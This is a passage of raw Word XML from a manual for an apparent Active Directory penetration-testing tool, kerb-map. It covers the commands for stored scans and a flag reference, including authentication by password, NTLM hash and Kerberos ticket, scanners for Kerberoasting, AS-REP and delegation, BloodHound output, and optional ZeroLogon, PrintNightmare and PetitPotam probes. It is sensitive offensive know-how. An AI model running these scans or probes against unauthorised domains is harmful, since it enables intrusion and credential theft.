        <w:t>Compare findings across multiple scans of the same domain over an engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2124657C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Replay findings without re-scanning the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C561158" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Track when new attack surface appears (new SPNs, new CVE conditions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE41640" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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0668AEE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5367D10" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># List all stored scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7AF197EB"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909759A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py --list-scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2E2703BE"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15DFFB2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5DD6E74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9C74CB8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Example output:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0BF8160B"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872ECEE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  ID   3  corp.local         DC: 192.168.1.10   Operator: jsmith   2024-01-15T14:30:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0A89980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7726496" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  ID   2  corp.local         DC: 192.168.1.10   Operator: jsmith   2024-01-14T09:15:11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="15A54C7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B98F2BE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="259988A7"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172A110" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Replay findings from scan #3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6C86F26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E1C3E19" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py --show-scan 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="100D324B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Use --no-cache to skip saving a scan to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F2835" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6659A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E349172" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc224561323"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.  Complete Flag Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="21BCADB7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60FD27" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc224561324"/>
      <w:r>
        <w:t>8.1  Target &amp; Authentication</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07BE4" w14:paraId="57320BBD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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49DC996F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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2EF7101E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2D6570D3"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5F93E62" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-d / --domain</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5DAFE95" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target domain name (e.g. corp.local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="26A516EE"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7A60833" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-dc / --dc-ip</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7955330" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain controller IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="376554FA"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66D6EAC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-u / --username</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F3B7787" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain username</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="611BA8CD"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4579D9FB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-p / --password</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6EAC3FE2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Plaintext password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2F8C7FF8"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D27A94B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-H / --hash</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596A6DE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NTLM hash. Accepts LM:NT or NT only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="077BE0A8"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3C162788" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-k / --kerberos</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38F76F76" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Use Kerberos ccache ticket. Set KRB5CCNAME first.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366637E4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AFBC6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc224561325"/>
      <w:r>
        <w:t>8.2  Module Selection</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07BE4" w14:paraId="34C28766" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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2B199B85" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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107006D3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3930E7EA"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5D1171E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--all</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170A32D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run all modules. This is the default if no specific module flags are given.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5AEE2A73"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43DCB6F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--spn</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71B2297A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run SPN scanner (Kerberoastable accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="532ACAD6"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DDF64CD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--asrep</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E2B034E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run AS-REP scanner (pre-auth disabled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5009241B"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BB44531" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--delegation</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3DCF2D49" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run delegation mapper (all three types)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1FC9EE6D"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9BB10CE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--users</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8805F03" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run user enumerator (policy, trusts, DnsAdmins, LAPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="670DBDC6"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0CC9A80" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--cves</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644FDE3D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run CVE / misconfiguration checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1C1D355B"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5363930" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--aggressive</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C3C9B43" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enable RPC-based CVE probes (ZeroLogon, PrintNightmare, PetitPotam). Generates Windows events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000051" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>--encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7020" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000052" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run weak encryption audit (RC4/DES on accounts and DCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000053" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>--trusts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7020" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000054" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run domain trust mapping with SID filtering risk assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="279499A2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6B0D3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc224561326"/>
      <w:r>
        <w:t>8.3  Output</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07BE4" w14:paraId="00D3B2E2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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694A4160" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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60BAFEF4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5F1AD7F4"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4822C37" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-o json</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0E728F4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Write full results to JSON file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4EFE2839"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3DB9824" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-o bloodhound</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3A685127" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Write BloodHound-compatible JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="25ADEF95"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759F17F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--outfile</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0923FFF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Override the default output filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="32D80271"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1CCCE7B8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--top N</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7BE24758" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Show top N entries in priority table (default: 15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="65CDE720"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3E26C1D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--no-cache</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05A5DD1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Do not save results to local SQLite database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2728AC6A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B26AA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc224561327"/>
      <w:r>
        <w:lastRenderedPageBreak/>
